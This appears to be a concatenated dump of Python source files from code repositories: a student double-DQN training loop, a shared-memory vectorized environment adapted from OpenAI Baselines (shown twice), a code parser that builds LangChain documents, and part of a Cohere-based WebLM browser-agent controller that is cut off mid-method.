#not suitable for continuous action
else: #if explore
#about exploration:https://www.youtube.com/watch?v=3htlYl4Whr8&t=2006s 55:18
action=torch.tensor([[random.randrange(self.num_actions)]], device= self.device, dtype= torch.long)
else:
#print(state)
#print(state.shape) #(84, 84, 4)
state = torch.from_numpy(state).permute(2,0,1).unsqueeze(0)
#(84, 84, 4) -->torch.size([1 ,4, 84, 84])
state = state.cuda() if use_cuda else state
action= self.online_net(state).max(1)[1].item()
#print(action)
return action
def update(self):
# TODO:
# To update model, we sample some stored experiences as training examples.
if len(self.memory) < self.batch_size:
return
transitions= self.memory.sample(self.batch_size)
#print(self.num_actions)
#input()
#print(len(transitions)) #a list of transitions, len = batch_size
#input()
# TODO:
# Compute Q(s_t, a) with your model.
#print(zip(*transitions)) #<zip object at 0x7f5d6b1b4788>
#print(*zip(*transitions)) #dereference the zip object
batch= Transition(*zip(*transitions))
non_final_mask =torch.tensor(tuple(map(lambda s: s is not None, batch.next_state)), dtype=torch.uint8)
#if we are at the final state, next_state will be None!!! So be careful.
#print(non_final_mask) #tensor([1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
#1, 1, 1, 1, 1, 1, 1, 1], dtype=torch.uint8)
#python map function: http://www.runoob.com/python/python-func-map.html
non_final_next_states = torch.cat([s for s in batch.next_state
if s is not None])
#print(len(batch.state)) #batch.state is a tuple #batch_size
state_batch = torch.cat(batch.state)
#print(state_batch.shape) # batch_size, 4, 84, 84
action_batch = torch.cat(batch.action)
#print(action_batch.shape) #batch_size, 1
#print(action_batch)
reward_batch = torch.cat(batch.reward)
#print(reward_batch.shape) #batch_size
#print(batch)
#print(self.online_net(state_batch).shape) #batch_size, num_of_action
state_action_values = self.online_net(state_batch).gather(1, action_batch)
#
#print(state_action_values.shape) #torch.Size([32, 1])
#input()
with torch.no_grad():
#print("HAHA")
# TODO:
# Compute Q(s_{t+1}, a) for all next states.
# Since we do not want to backprop through the expected action values,
# use torch.no_grad() to stop the gradient from Q(s_{t+1}, a)
next_state_values= torch.zeros(self.batch_size, device= self.device)
#print(self.target_net(non_final_next_states))
#print(self.target_net(non_final_next_states).shape) #torch.Size([32, 7]) #batch_size, num_of_actions
#each sample has 7 values corresponding to 7 actions, given the next_state
#print(self.target_net(non_final_next_states).max(1))
#print(self.target_net(non_final_next_states).max(1)[0].shape) #torch.Size([32])
#print(self.target_net(non_final_next_states).max(1)[0].detach()) #Returns a new Tensor, detached from the current graph.
#If keepdim is True, the output tensors are of the same size as input except in the dimension dim where they are of size 1. Otherwise, dim is squeezed (see torch.squeeze()), resulting in the output tensors having 1 fewer dimension than input.
#print(next_state_actions)
#print(next_state_actions.shape) #torch.Size([32, 1])
#print(self.target_net(non_final_next_states).gather(1, next_state_actions).shape) #torch.Size([32, 1])
next_state_actions =self.online_net(non_final_next_states).max(1)[1].unsqueeze(1) #argmax(a') Q(s', a', w)
next_state_values[non_final_mask]= self.target_net(non_final_next_states).gather(1, next_state_actions).squeeze().detach()
#you must detach() or the performance will drop
#input()
# TODO:
# Compute the expected Q values: rewards + gamma * max(Q(s_{t+1}, a))
# You should carefully deal with gamma * max(Q(s_{t+1}, a)) when it is the terminal state.
expected_state_action_values = (self.GAMMA*next_state_values) +reward_batch
#expected_state_action_values is the learning target!!!
#value functions decompose into a Bellman equation
#print(expected_state_action_values)
#print(expected_state_action_values.shape) #torch.Size([32]) batch_size
#whole process: https://www.youtube.com/watch?v=3htlYl4Whr8&t=2006s 53:41
# TODO:
# Compute temporal difference loss -->HOW????
#update value toward estimated return
#https://www.youtube.com/watch?v=3htlYl4Whr8 31:00
#in pytorch tutorial, they use Huber loss, you can try that later
#https://www.youtube.com/watch?v=3htlYl4Whr8&t=2006s 41:18 MSE loss
#mse_loss= nn.MSELoss()
#loss= mse_loss(state_action_values,expected_state_action_values.unsqueeze(1))
loss= F.smooth_l1_loss(state_action_values,expected_state_action_values.unsqueeze(1))
#print(loss)
self.optimizer.zero_grad()
loss.backward()
self.optimizer.step()
#print(loss)
#input()
return loss.item()
def train(self):
episodes_done_num = 0 # passed episodes
total_reward = 0 # compute average reward
loss = 0
x=[]
y=[]
while(True):
state = self.env.reset()
# State: (80,80,4) --> (1,4,80,80)
state = torch.from_numpy(state).permute(2,0,1).unsqueeze(0)
state = state.cuda() if use_cuda else state
done = False
while(not done):
# select and perform action
action = self.make_action(state)
next_state, reward, done, _ = self.env.step(action[0, 0].data.item())
#print(next_state)
#print(reward)
#input()
total_reward += reward
reward= torch.tensor([reward], device= self.device) #NOT so sure
# process new state
next_state = torch.from_numpy(next_state).permute(2,0,1).unsqueeze(0)
next_state = next_state.cuda() if use_cuda else next_state
if done:
next_state = None
# TODO:
# store the transition in memory
self.memory.push(state, action, next_state, reward)
# move to the next state
state = next_state
# Perform one step of the optimization
if self.steps > self.learning_start and self.steps % self.train_freq == 0:
loss = self.update()
# update target network
if self.steps > self.learning_start and self.steps % self.target_update_freq == 0:
self.target_net.load_state_dict(self.online_net.state_dict())
# save the model
if self.steps % self.save_freq == 0:
self.save('dqn')
self.steps += 1
if episodes_done_num % self.display_freq == 0:
x.append(self.steps)
y.append(total_reward / self.display_freq) #avg reward in last 10 episodes
print('Episode: %d | Steps: %d/%d | Avg reward: %f | loss: %f '%
(episodes_done_num, self.steps, self.num_timesteps, total_reward / self.display_freq, loss))
total_reward = 0
#plt.plot(x, y)
#plt.xlabel('Timesteps')
#plt.ylabel('Avg reward in last 10 episodes')
#plt.show()
#plt.savefig('dqn_baseline.png')
episodes_done_num += 1
if self.steps > self.num_timesteps:
break
self.save('dqn')
pickle_out_x= open('ddqn_x_0.99.pkl', 'wb')
pickle_out_y=open('ddqn_y_0.99.pkl', 'wb')
pickle.dump(x, pickle_out_x)
pickle.dump(y, pickle_out_y)
pickle_out_x.close()
pickle_out_y.close()
| [] |
2024-01-10 | tzutengweng33176/ADL_2019 | A3~a2c~vec_env~shmem_vec_env.py | """
An interface for asynchronous vectorized environments.
Modify from OpenAI Baseline
Reference: https://raw.githubusercontent.com/openai/baselines/master/baselines/common/vec_env/shmem_vec_env.py
"""
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
import ctypes
from .util import dict_to_obs, obs_space_info, obs_to_dict
_NP_TO_CT = {np.float32: ctypes.c_float,
np.int32: ctypes.c_int32,
np.int8: ctypes.c_int8,
np.uint8: ctypes.c_char,
np.bool: ctypes.c_bool}
class ShmemVecEnv(VecEnv):
"""
Optimized version of SubprocVecEnv that uses shared variables to communicate observations.
"""
def __init__(self, env_fns, spaces=None, context='spawn'):
"""
If you don't specify observation_space, we'll have to create a dummy
environment to get it.
"""
ctx = mp.get_context(context)
if spaces:
observation_space, action_space = spaces
else:
dummy = env_fns[0]()
observation_space, action_space = dummy.observation_space, dummy.action_space
dummy.close()
del dummy
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
self.obs_keys, self.obs_shapes, self.obs_dtypes = obs_space_info(observation_space)
self.obs_bufs = [
{k: ctx.Array(_NP_TO_CT[self.obs_dtypes[k].type], int(np.prod(self.obs_shapes[k]))) for k in self.obs_keys}
for _ in env_fns]
self.parent_pipes = []
self.procs = []
with clear_mpi_env_vars():
for env_fn, obs_buf in zip(env_fns, self.obs_bufs):
wrapped_fn = CloudpickleWrapper(env_fn)
parent_pipe, child_pipe = ctx.Pipe()
proc = ctx.Process(target=_subproc_worker,
args=(child_pipe, parent_pipe, wrapped_fn, obs_buf, self.obs_shapes, self.obs_dtypes, self.obs_keys))
proc.daemon = True
self.procs.append(proc)
self.parent_pipes.append(parent_pipe)
proc.start()
child_pipe.close()
self.waiting_step = False
self.viewer = None
def reset(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('reset', None))
return self._decode_obses([pipe.recv() for pipe in self.parent_pipes])
def step_async(self, actions):
assert len(actions) == len(self.parent_pipes)
for pipe, act in zip(self.parent_pipes, actions):
pipe.send(('step', act))
def step_wait(self):
outs = [pipe.recv() for pipe in self.parent_pipes]
obs, rews, dones, infos = zip(*outs)
return self._decode_obses(obs), np.array(rews), np.array(dones), infos
def close_extras(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('close', None))
for pipe in self.parent_pipes:
pipe.recv()
pipe.close()
for proc in self.procs:
proc.join()
def get_images(self, mode='human'):
for pipe in self.parent_pipes:
pipe.send(('render', None))
return [pipe.recv() for pipe in self.parent_pipes]
def _decode_obses(self, obs):
result = {}
for k in self.obs_keys:
bufs = [b[k] for b in self.obs_bufs]
o = [np.frombuffer(b.get_obj(), dtype=self.obs_dtypes[k]).reshape(self.obs_shapes[k]) for b in bufs]
result[k] = np.array(o)
return dict_to_obs(result)
def _subproc_worker(pipe, parent_pipe, env_fn_wrapper, obs_bufs, obs_shapes, obs_dtypes, keys):
"""
Control a single environment instance using IPC and
shared memory.
"""
def _write_obs(maybe_dict_obs):
flatdict = obs_to_dict(maybe_dict_obs)
for k in keys:
dst = obs_bufs[k].get_obj()
dst_np = np.frombuffer(dst, dtype=obs_dtypes[k]).reshape(obs_shapes[k]) # pylint: disable=W0212
np.copyto(dst_np, flatdict[k])
env = env_fn_wrapper.x()
parent_pipe.close()
try:
while True:
cmd, data = pipe.recv()
if cmd == 'reset':
pipe.send(_write_obs(env.reset()))
elif cmd == 'step':
obs, reward, done, info = env.step(data)
if done:
obs = env.reset()
pipe.send((_write_obs(obs), reward, done, info))
elif cmd == 'render':
pipe.send(env.render(mode='rgb_array'))
elif cmd == 'close':
pipe.send(None)
break
else:
raise RuntimeError('Got unrecognized cmd %s' % cmd)
except KeyboardInterrupt:
print('ShmemVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
| [] |
2024-01-10 | tzutengweng33176/ADL_2019 | A3~r07922118~a2c~vec_env~shmem_vec_env.py | """
An interface for asynchronous vectorized environments.
Modify from OpenAI Baseline
Reference: https://raw.githubusercontent.com/openai/baselines/master/baselines/common/vec_env/shmem_vec_env.py
"""
import multiprocessing as mp
import numpy as np
from .vec_env import VecEnv, CloudpickleWrapper, clear_mpi_env_vars
import ctypes
from .util import dict_to_obs, obs_space_info, obs_to_dict
_NP_TO_CT = {np.float32: ctypes.c_float,
np.int32: ctypes.c_int32,
np.int8: ctypes.c_int8,
np.uint8: ctypes.c_char,
np.bool: ctypes.c_bool}
class ShmemVecEnv(VecEnv):
"""
Optimized version of SubprocVecEnv that uses shared variables to communicate observations.
"""
def __init__(self, env_fns, spaces=None, context='spawn'):
"""
If you don't specify observation_space, we'll have to create a dummy
environment to get it.
"""
ctx = mp.get_context(context)
if spaces:
observation_space, action_space = spaces
else:
dummy = env_fns[0]()
observation_space, action_space = dummy.observation_space, dummy.action_space
dummy.close()
del dummy
VecEnv.__init__(self, len(env_fns), observation_space, action_space)
self.obs_keys, self.obs_shapes, self.obs_dtypes = obs_space_info(observation_space)
self.obs_bufs = [
{k: ctx.Array(_NP_TO_CT[self.obs_dtypes[k].type], int(np.prod(self.obs_shapes[k]))) for k in self.obs_keys}
for _ in env_fns]
self.parent_pipes = []
self.procs = []
with clear_mpi_env_vars():
for env_fn, obs_buf in zip(env_fns, self.obs_bufs):
wrapped_fn = CloudpickleWrapper(env_fn)
parent_pipe, child_pipe = ctx.Pipe()
proc = ctx.Process(target=_subproc_worker,
args=(child_pipe, parent_pipe, wrapped_fn, obs_buf, self.obs_shapes, self.obs_dtypes, self.obs_keys))
proc.daemon = True
self.procs.append(proc)
self.parent_pipes.append(parent_pipe)
proc.start()
child_pipe.close()
self.waiting_step = False
self.viewer = None
def reset(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('reset', None))
return self._decode_obses([pipe.recv() for pipe in self.parent_pipes])
def step_async(self, actions):
assert len(actions) == len(self.parent_pipes)
for pipe, act in zip(self.parent_pipes, actions):
pipe.send(('step', act))
def step_wait(self):
outs = [pipe.recv() for pipe in self.parent_pipes]
obs, rews, dones, infos = zip(*outs)
return self._decode_obses(obs), np.array(rews), np.array(dones), infos
def close_extras(self):
if self.waiting_step:
self.step_wait()
for pipe in self.parent_pipes:
pipe.send(('close', None))
for pipe in self.parent_pipes:
pipe.recv()
pipe.close()
for proc in self.procs:
proc.join()
def get_images(self, mode='human'):
for pipe in self.parent_pipes:
pipe.send(('render', None))
return [pipe.recv() for pipe in self.parent_pipes]
def _decode_obses(self, obs):
result = {}
for k in self.obs_keys:
bufs = [b[k] for b in self.obs_bufs]
o = [np.frombuffer(b.get_obj(), dtype=self.obs_dtypes[k]).reshape(self.obs_shapes[k]) for b in bufs]
result[k] = np.array(o)
return dict_to_obs(result)
def _subproc_worker(pipe, parent_pipe, env_fn_wrapper, obs_bufs, obs_shapes, obs_dtypes, keys):
"""
Control a single environment instance using IPC and
shared memory.
"""
def _write_obs(maybe_dict_obs):
flatdict = obs_to_dict(maybe_dict_obs)
for k in keys:
dst = obs_bufs[k].get_obj()
dst_np = np.frombuffer(dst, dtype=obs_dtypes[k]).reshape(obs_shapes[k]) # pylint: disable=W0212
np.copyto(dst_np, flatdict[k])
env = env_fn_wrapper.x()
parent_pipe.close()
try:
while True:
cmd, data = pipe.recv()
if cmd == 'reset':
pipe.send(_write_obs(env.reset()))
elif cmd == 'step':
obs, reward, done, info = env.step(data)
if done:
obs = env.reset()
pipe.send((_write_obs(obs), reward, done, info))
elif cmd == 'render':
pipe.send(env.render(mode='rgb_array'))
elif cmd == 'close':
pipe.send(None)
break
else:
raise RuntimeError('Got unrecognized cmd %s' % cmd)
except KeyboardInterrupt:
print('ShmemVecEnv worker: got KeyboardInterrupt')
finally:
env.close()
| [] |
2024-01-10 | fynnfluegge/codeqai | codeqai~codeparser.py | import os
from langchain.schema import Document
from langchain.text_splitter import RecursiveCharacterTextSplitter
from codeqai import repo, utils
from codeqai.constants import Language
from codeqai.treesitter.treesitter import Treesitter, TreesitterMethodNode
def parse_code_files(code_files: list[str]) -> list[Document]:
documents = []
code_splitter = None
for code_file in code_files:
with open(code_file, "r") as file:
file_bytes = file.read().encode()
commit_hash = repo.get_commit_hash(code_file)
file_extension = utils.get_file_extension(code_file)
programming_language = utils.get_programming_language(file_extension)
if programming_language == Language.UNKNOWN:
continue
langchain_language = utils.get_langchain_language(programming_language)
if langchain_language:
code_splitter = RecursiveCharacterTextSplitter.from_language(
language=langchain_language,
chunk_size=512,
chunk_overlap=128,
)
treesitter_parser = Treesitter.create_treesitter(programming_language)
treesitterNodes: list[TreesitterMethodNode] = treesitter_parser.parse(
file_bytes
)
for node in treesitterNodes:
method_source_code = node.method_source_code
filename = os.path.basename(code_file)
if node.doc_comment and programming_language != Language.PYTHON:
method_source_code = node.doc_comment + "\n" + method_source_code
splitted_documents = [method_source_code]
if code_splitter:
splitted_documents = code_splitter.split_text(method_source_code)
for splitted_document in splitted_documents:
document = Document(
page_content=splitted_document,
metadata={
"filename": filename,
"method_name": node.name,
"commit_hash": commit_hash,
},
)
documents.append(document)
return documents
| [] |
2024-01-10 | russelnelson/weblm | weblm~controller.py | import csv
import heapq
import itertools
import json
import math
import os
import re
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor
from enum import Enum
from typing import Any, DefaultDict, Dict, List, Tuple, Union
import cohere
import numpy as np
from requests.exceptions import ConnectionError
MAX_SEQ_LEN = 2000
MAX_NUM_ELEMENTS = 50
TYPEABLE = ["input", "select"]
CLICKABLE = ["link", "button"]
MODEL = "xlarge"
help_msg = """Welcome to WebLM!
The goal of this project is build a system that takes an objective from the user, and operates a browser to carry it out.
For example:
- book me a table for 2 at bar isabel next wednesday at 7pm
- i need a flight from SF to London on Oct 15th nonstop
- buy me more whitening toothpaste from amazon and send it to my apartment
WebLM learns to carry out tasks *by demonstration*. That means that you'll need to guide it and correct it when it goes astray. Over time, the more people who use it, the more tasks it's used for, WebLM will become better and better and rely less and less on user input.
To control the system:
- You can see what the model sees at each step by looking at the list of elements the model can interact with
- show: You can also see a picture of the browser window by typing `show`
- goto: You can go to a specific webpage by typing `goto www.yourwebpage.com`
- success: When the model has succeeded at the task you set out (or gotten close enough), you can teach the model by typing `success` and it will save it's actions to use in future interations
- cancel: If the model is failing or you made a catastrophic mistake you can type `cancel` to kill the session
- help: Type `help` to show this message
Everytime you use WebLM it will improve. If you want to contribute to the project and help us build join the discord (https://discord.com/invite/co-mmunity) or send an email to [email protected]"""
prompt_template = """Given:
(1) an objective that you are trying to achieve
(2) the URL of your current web page
(3) a simplified text description of what's visible in the browser window
Your commands are:
click X - click on element X.
type X "TEXT" - type the specified text into input X
Here are some examples:
$examples
Present state:
$state
Next Command:"""
state_template = """Objective: $objective
Current URL: $url
Current Browser Content:
------------------
$browser_content
------------------
Previous actions:
$previous_commands"""
prioritization_template = """$examples
---
Here are the most relevant elements on the webpage (links, buttons, selects and inputs) to achieve the objective below:
Objective: $objective
URL: $url
Relevant elements:
{element}"""
priorit_tmp = ("Objective: {objective}"
"\nURL: {url}"
"\nRelevant elements:"
"\n{elements}")
user_prompt_end = ("\n\t(success) the goal is accomplished"
"\n\t(cancel) terminate the session"
"\nType a choice and then press enter:")
user_prompt_1 = ("Given web state:\n{state}"
"\n\nI have to choose between `clicking` and `typing` here."
"\n**I think I should{action}**"
"\n\t(y) proceed with this action"
"\n\t(n) do the other action" + user_prompt_end)
user_prompt_2 = ("Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}"
"\n\nSuggested command: {cmd}.\n\t(y) accept and continue"
"\n\t(s) save example, accept, and continue"
"\n{other_options}"
"\n\t(back) choose a different action"
"\n\t(enter a new command) type your own command to replace the model's suggestion" + user_prompt_end)
user_prompt_3 = ("Given state:\n{self._construct_state(self.objective, url, pruned_elements, self.previous_commands)}"
"\n\nSuggested command: {self._cmd}.\n\t(y) accept and continue"
"\n\t(s) save example, accept, and continue"
"\n\t(back) choose a different action"
"\n\t(enter a new command) type your own command to replace the model's suggestion" + user_prompt_end)
def _fn(x):
if len(x) == 3:
option, prompt, self = x
return_likelihoods = "ALL"
elif len(x) == 4:
option, prompt, self, return_likelihoods = x
while True:
try:
if len(self.co.tokenize(prompt)) > 2048:
prompt = truncate_left(self.co.tokenize, prompt)
return (self.co.generate(prompt=prompt, max_tokens=0, model=MODEL,
return_likelihoods=return_likelihoods).generations[0].likelihood, option)
except cohere.error.CohereError as e:
print(f"Cohere fucked up: {e}")
continue
except ConnectionError as e:
print(f"Connection error: {e}")
continue
def truncate_left(tokenize, prompt, *rest_of_prompt, limit=2048):
i = 0
chop_size = 5
print(f"WARNING: truncating sequence of length {len(tokenize(prompt + ''.join(rest_of_prompt)))} to length {limit}")
while len(tokenize(prompt + "".join(rest_of_prompt))) > limit:
prompt = prompt[i * chop_size:]
i += 1
return prompt
def split_list_by_separators(l: List[Any], separator_sequences: List[List[Any]]) -> List[List[Any]]:
"""Split a list by a subsequence.
split_list_by_separators(range(7), [[2, 3], [5]]) == [[0, 1], [4], [6]]
"""
split_list: List[List[Any]] = []
tmp_seq: List[Any] = []
i = 0
while i < len(l):
item = l[i]
# if this item may be part of one of the separator_sequences
if any(item == x[0] for x in separator_sequences):
for s in filter(lambda x: item == x[0], separator_sequences):
# if we've found a matching subsequence
if l[i:i + len(s)] == s:
if len(tmp_seq) != 0:
split_list.append(tmp_seq)
tmp_seq = []
i += len(s)
break
else:
i += 1
else:
tmp_seq.append(item)
i += 1
if len(tmp_seq) != 0:
split_list.append(tmp_seq)
return split_list
def search(co: cohere.Client, query: str, items: List[str], topk: int) -> List[str]:
embedded_items = np.array(co.embed(texts=items, truncate="RIGHT").embeddings)
embedded_query = np.array(co.embed(texts=[query], truncate="RIGHT").embeddings[0])
scores = np.einsum("i,ji->j", embedded_query,
embedded_items) / (np.linalg.norm(embedded_query) * np.linalg.norm(embedded_items, axis=1))
ind = np.argsort(scores)[-topk:]
return np.flip(np.array(items)[ind], axis=0)
class Prompt:
def __init__(self, prompt: str) -> None:
self.prompt = prompt
def __str__(self) -> str:
return self.prompt
class Command:
def __init__(self, cmd: str) -> None:
self.cmd = cmd
def __str__(self) -> str:
return self.cmd
class DialogueState(Enum):
Unset = None
Action = "pick action"
ActionFeedback = "action from feedback"
Command = "suggest command"
CommandFeedback = "command from feedback"
class Controller:
"""A Cohere-powered controller that takes in a browser state and produces and action.
The basic outline of this Controller's strategy is:
1. receive page content from browser
2. prioritise elements on page based on how relevant they are to the objective
3. look up similar states from the past
4. choose between clicking and typing
5. choose what element to click or what element to type in
"""
def __init__(self, co: cohere.Client, objective: str):
"""
Args:
co (cohere.Client): a Cohere Client
objective (str): the objective to accomplish
"""
self.co = co
self.objective = objective
self.previous_commands: List[str] = []
self.moments: List[Tuple[str, str, str, List[str]]] = []
self.user_responses: DefaultDict[str, int] = defaultdict(int)
self.reset_state()
def is_running(self):
return self._step != DialogueState.Unset
def reset_state(self):
self._step = DialogueState.Unset
self._action = None
self._cmd = None
self._chosen_elements: List[Dict[str, str]] = []
self._prioritized_elements = None
self._pruned_prioritized_elements = None
self._prioritized_elements_hash = None
self._page_elements = None
self._error = None
def success(self):
for url, elements, command, previous_commands in self.moments:
self._save_example(objective=self.objective,
url=url,
elements=elements,
command=command,
previous_commands=previous_commands)
def choose(self,
template: str,
options: List[Dict[str, str]],
return_likelihoods: str = "ALL",
topk: int = 1) -> List[Tuple[int, Dict[str, str]]]:
"""Choose the most likely continuation of `prompt` from a set of `options`.
Args:
template (str): a string template with keys that match the dictionaries in `options`
options (List[Dict[str, str]]): the options to be chosen from
Returns:
str: the most likely option from `options`
"""
num_options = len(options)
with ThreadPoolExecutor(num_options) as pp:
_lh = pp.map(
_fn,
zip(options, [template.format(**option) for option in options], [self] * num_options,
[return_likelihoods] * num_options))
return sorted(_lh, key=lambda x: x[0], reverse=True)[:topk]
def choose_element(self,
template: str,
options: List[Dict[str, str]],
group_size: int = 10,
topk: int = 1) -> List[Dict[str, str]]:
"""A hacky way of choosing the most likely option, while staying within sequence length constraints
Algo:
1. chunk `options` into groups of `group_size`
2. within each group perform a self.choose to get the topk elements (we'll have num_groups*topk elements after this)
3. flatten and repeat recursively until the number of options is down to topk
Args:
template (str): the prompt template with f-string style template tags
options (List[Dict[str, str]]): a list of dictionaries containing key-value replacements of the template tags
group_size (int, optional): The size of each group of options to select from. Defaults to 10.
topk (int, optional): The topk most likely options to return. Defaults to 1.
Returns:
List[Dict[str, str]]: The `topk` most likely elements in `options` according to the model
"""
num_options = len(options)
num_groups = int(math.ceil(num_options / group_size))
if num_options == 0:
raise Exception()
choices = []
for i in range(num_groups):
group = options[i * group_size:(i + 1) * group_size]
template_tmp = template.replace("elements", "\n".join(item["elements"] for item in group))
options_tmp = [{"id": item["id"]} for item in group]
choice = [x[1] for x in self.choose(template_tmp, options_tmp, topk=topk)]
chosen_elements = []
for x in choice:
chosen_elements.append(list(filter(lambda y: y["id"] == x["id"], group))[0])
choices.extend(chosen_elements)
if len(choices) <= topk:
return choices
else:
return self.choose_element(template, choices, group_size, topk)
def gather_examples(self, state: str, topk: int = 5) -> List[str]:
"""Simple semantic search over a file of past interactions to find the most similar ones."""
with open("examples.json", "r") as fd:
history = json.load(fd)
if len(history) == 0:
return []
embeds = [h["embedding"] for h in history]
examples = [h["example"] for h in history]
embeds = np.array(embeds)
embedded_state = np.array(self.co.embed(texts=[state], truncate="RIGHT").embeddings[0])
scores = np.einsum("i,ji->j", embedded_state,
embeds) / (np.linalg.norm(embedded_state) * np.linalg.norm(embeds, axis=1))
ind = np.argsort(scores)[-topk:]
examples = np.array(examples)[ind]
states = []
for i in ind:
h = history[int(i)]
if all(x in h for x in ["objective", "url", "elements", "previous_commands"]):
states.append(
self._construct_state(objective=h["objective"],
url=h["url"],
page_elements=h["elements"],
previous_commands=h["previous_commands"]))
else:
states.append(h["example"])
return states
def gather_prioritisation_examples(self, state: str, topk: int = 6, num_elements: int = 3) -> List[str]:
"""Simple semantic search over a file of past interactions to find the most similar ones."""
with open("examples.json", "r") as fd:
history = json.load(fd)
if len(history) == 0:
return []
embeds = [h["embedding"] for h in history]
examples = [h["example"] for h in history]
embeds = np.array(embeds)
embedded_state = np.array(self.co.embed(texts=[state], truncate="RIGHT").embeddings[0])
scores = np.einsum("i,ji->j", embedded_state,
embeds) / (np.linalg.norm(embedded_state) * np.linalg.norm(embeds, axis=1))
ind = np.argsort(scores)[-topk:]
examples = np.array(examples)[ind]
prioritisation_examples = []
for i, h in enumerate(history):
if i in ind:
if all(x in h for x in ["objective", "command", "url", "elements"]):
# make sure the element relevant to the next command is included
elements = h["elements"]
command_element = " ".join(h["command"].split()[1:3])
command_element = list(filter(lambda x: command_element in x, elements))
assert len(command_element) == 1
command_element = command_element[0]
if not command_element in elements[:num_elements]:
elements = [command_element] + elements[:-1]
elements = elements[:num_elements]
objective = h["objective"]
url = h["url"]
elements = '\n'.join(elements)
prioritisation_example = eval(f'f"""{priorit_tmp}"""')
prioritisation_examples.append(prioritisation_example)
return prioritisation_examples
def _construct_prev_cmds(self, previous_commands: List[str]) -> str:
return "\n".join(f"{i+1}. {x}" for i, x in enumerate(previous_commands)) if previous_commands else "None"
def _construct_state(self, objective: str, url: str, page_elements: List[str], previous_commands: List[str]) -> str:
state = state_template
state = state.replace("$objective", objective)
state = state.replace("$url", url[:100])
state = state.replace("$previous_commands", self._construct_prev_cmds(previous_commands))
return state.replace("$browser_content", "\n".join(page_elements))
def _construct_prompt(self, state: str, examples: List[str]) -> str:
prompt = prompt_template
prompt = prompt.replace("$examples", "\n\n".join(examples))
return prompt.replace("$state", state)
def _save_example(self, objective: str, url: str, elements: List[str], command: str, previous_commands: List[str]):
state = self._construct_state(objective, url, elements[:MAX_NUM_ELEMENTS], previous_commands)
example = ("Example:\n"
f"{state}\n"
f"Next Command: {command}\n"
"----")
print(f"Example being saved:\n{example}")
with open("examples.json", "r") as fd:
history = json.load(fd)
examples = [h["example"] for h in history]
if example in examples:
print("example already exists")
return
history.append({
"example": example,
"embedding": self.co.embed(texts=[example]).embeddings[0],
"url": url,
"elements": elements,
"command": command,
"previous_commands": previous_commands,
"objective": objective,
})
with open("examples_tmp.json", "w") as fd:
json.dump(history, fd)
os.replace("examples_tmp.json", "examples.json")
def _construct_responses(self):
keys_to_save = ["y", "n", "s", "command", "success", "cancel"]
responses_to_save = defaultdict(int)
for key, value in self.user_responses.items():
if key in keys_to_save:
responses_to_save[key] = value
elif key not in keys_to_save and key:
responses_to_save["command"] += 1
self.user_responses = responses_to_save
print(f"Responses being saved:\n{dict(responses_to_save)}")
def save_responses(self):
keys_to_save = ["y", "n", "s", "command", "success", "cancel"]
# Check if data file already exists
responses_filepath = "responses.csv"
if os.path.isfile(responses_filepath):
print("File exists")
with open(responses_filepath, "a+") as fd:
wr = csv.writer(fd, quoting=csv.QUOTE_ALL)
wr.writerow([self.user_responses[key] for key in keys_to_save])
else:
print("No data available")
with open(responses_filepath, "w+") as fd:
wr = csv.writer(fd, quoting=csv.QUOTE_ALL)
wr.writerow(keys_to_save)
wr.writerow([self.user_responses[key] for key in keys_to_save])
def _shorten_prompt(self,
objective: str,
url: str,
elements: List[str],
previous_commands: List[str],
examples: List[str],
*rest_of_prompt,
target: int = MAX_SEQ_LEN):
state = self._construct_state(objective, url, elements, previous_commands)
prompt = self._construct_prompt(state, examples)
tokenized_prompt = self.co.tokenize(prompt + "".join(rest_of_prompt))
tokens = tokenized_prompt.token_strings
split_tokens = split_list_by_separators(tokens,
[['EX', 'AMP', 'LE'], ["Example"], ["Present", " state", ":", "\n"]])
example_tokens = split_tokens[1:-1]
length_of_examples = list(map(len, example_tokens))
state_tokens = split_tokens[-1]
state_tokens = list(
itertools.chain.from_iterable(
split_list_by_separators(state_tokens, [['----', '----', '----', '----', '--', '\n']])[1:-1]))
state_tokens = split_list_by_separators(state_tokens, [["\n"]])
length_of_elements = list(map(len, state_tokens))
length_of_prompt = len(tokenized_prompt)
def _fn(i, j):
state = self._construct_state(objective, url, elements[:len(elements) - i], previous_commands)
prompt = self._construct_prompt(state, examples[j:])
return state, prompt
MIN_EXAMPLES = 1
i, j = (0, 0)
while (length_of_prompt - sum(length_of_examples)) + sum(
length_of_examples[j:]) > target and j < len(examples) - MIN_EXAMPLES:
j += 1
print(f"num examples: {len(examples) - j}")
state, prompt = _fn(i, j)
if len(self.co.tokenize(prompt + "".join(rest_of_prompt))) <= target:
return state, prompt
MIN_ELEMENTS = 7
while (length_of_prompt - sum(length_of_examples[:j]) - sum(length_of_elements)) + sum(
length_of_elements[:len(length_of_elements) - i]) > target and i < len(elements) - MIN_ELEMENTS:
i += 1
print(f"num elements: {len(length_of_elements) - i}")
state, prompt = _fn(i, j)
# last resort, start cutting off the bigging of the prompt
if len(self.co.tokenize(prompt + "".join(rest_of_prompt))) > target:
prompt = truncate_left(self.co.tokenize, prompt, *rest_of_prompt, limit=target)
return state, prompt
def _generate_prioritization(self, page_elements: List[str], url: str):
state = self._construct_state(self.objective, url, page_elements, self.previous_commands)
examples = self.gather_prioritisation_examples(state)
prioritization = prioritization_template
prioritization = prioritization.replace("$examples", "\n---\n".join(examples))
prioritization = prioritization.replace("$objective", self.objective)
prioritization = prioritization.replace("$url", url)
self._prioritized_elements = self.choose(prioritization, [{
"element": x
} for x in page_elements],
topk=len(page_elements))
self._prioritized_elements = [x[1]["element"] for x in self._prioritized_elements]
self._prioritized_elements_hash = hash(frozenset(page_elements))
self._pruned_prioritized_elements = self._prioritized_elements[:MAX_NUM_ELEMENTS]
self._step = DialogueState.Action
print(self._prioritized_elements)
def pick_action(self, url: str, page_elements: List[str], response: str = None):
# this strategy for action selection does not work very well, TODO improve this
